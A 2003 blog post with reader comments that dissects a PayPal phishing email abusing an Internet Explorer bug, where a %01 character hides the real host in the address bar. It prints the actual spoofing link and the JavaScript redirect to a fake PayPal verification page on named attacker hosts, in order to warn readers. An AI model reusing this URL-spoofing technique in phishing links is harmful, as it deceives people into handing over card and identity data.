The security vulnerability in Internet Explorer that was published a few weeks ago has been exploited. Not only that, it's been done almost exactly as I commented (envisioned?) here on Sam Ruby's blog, only using spam instead of a weblog entry.
This is the spam email I received:
Viewing the html-source revealed that the "click here" link does not actually go to paypal, but is really the following html:
<a href="http://www.paypal.com%01%01%01%01The %01's here don't actually exploit the security vulnerability, but merely create enough filler to ensure the real url does not show on the status-bar. The page on youlikeshe.com contains the javascript that exploits the IE bug:%01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01%01%01%01 %01@pp.youlikeshe.com ">click here</a>
<script language="JavaScript">
location.href=unescape('http://www.paypal.com%01@www.epack.ch/p/verify.htm ');
</script>
which redirects the user's browser to http://www.paypal.com*@www.epack.ch/p/verify.htm, where "*" is a char(1). This page does not only look just like paypal, is also shows http://www.paypal.com on the address bar because the bug in IE hides everything after the char(1).
I'm sure a lot of paypal users fell for this and submitted their name, address, credit card info, social security number, etc. to some ruthless crook who can not only rob them using their credit card, but worse, steal their identity using all the other information that was entered.
I forwarded the spoof email in question to paypal and hope they will be able to catch these people and prosecute them to the maximum extent of the law...
Update: replaced some characters in the JavaScript-snippet with html entities because some overeager virus scanners were under the mistaken impression that this blog-entry exploited the security vulnerability itself. Hopefully they won't think so anymore now...
This exploit has been around awhile. I got this very same email back in June of this year.
I notified PayPal and my ISP but nothing happened. I didn't even get a return email from
either one. I just checked the PayPal website and they have a warning but you have to follow
a link to get there. I would think this is important enough to put on the home page but I guess
not.
- Gene
Posted by Gene at December 28, 2003 1:22 AMYes, paypal spoofs are nothing new, but you used to be able to recognise them because the url in the address-bar would not say paypal.com - now it does (for IE users anyway).
Posted by Luke Hutteman at December 28, 2003 1:30 AMI just sumbitted (to my ISP, the ISP of the sender, and the ISP - in China - of the site that the E-Mail click would end up sending you to) a very simluar e-mail that my wife got from Earthlink the other day. The next day (Christmas) my daughter got the same E-Mail as my wife. The only thing that tipped my wife to ask me about it was that she got the E-Mail, not me as the primary owner of the account - though she pays the bill.
Posted by David at December 28, 2003 3:05 AMDO NOT FALL FOR THIS!!!!
PLEASE DO NOT FALL FOR THIS SCAM! Please click here to read all about this PayPal scam caused by an IE bug. Thanks go out to Hutteman.com for this gem...
Actually I think the host for http://www.epack.ch/p/ has already taken the site down and it now redirects to the real PayPal.
Since I use a recent build of Mozilla Thunderbird, I was already aware of this, since it removes the URL padding. The URL in the status bar was 'http://www.paypal.com@pp.youlikeshe.com/'.
Posted by Neil T. at December 28, 2003 3:48 AMThis only works in Outlook Express and Internet Explorer, as far as I know. I tested it a few weeks ago and it didn't work in Outlook or Thunderbird, just Outlook Express.
Posted by Shannon J Hager at December 28, 2003 4:09 AMThe Internet explorer security bug everyone should know about
The Internet explorer security bug everyone should know about
Your blog is causing my rss reader (with IE viewer) and my virus scanner to bug out because apparently its detecting this spoof in your e-mails. See if you can fix the problem in your blog entry.
Greg
Posted by Greg S. at December 28, 2003 6:19 PMIE Phishing
Like just about everybody else, I've received plenty of phishing attempts in my email. Most of them are for eBay or PayPal, though Visa is on the rise as well. The latest IE vulnerability is already playing into the phishers' hands. Luke Hutteman has a pr
Microsoft site? I hacked it. (Or maybe not...)
My own scam (my _god_ I'm lame :P)
hibajavításra sajtótájékoztató szférában disk csatolóknál
Warning: PayPal Scams and other Bank Scams
Every other day or so, I receive an e-mail from someone claiming to be PayPal or another bank of some variety. Of course, each e-mail wants me to immediately click on the link and enter my username and password to...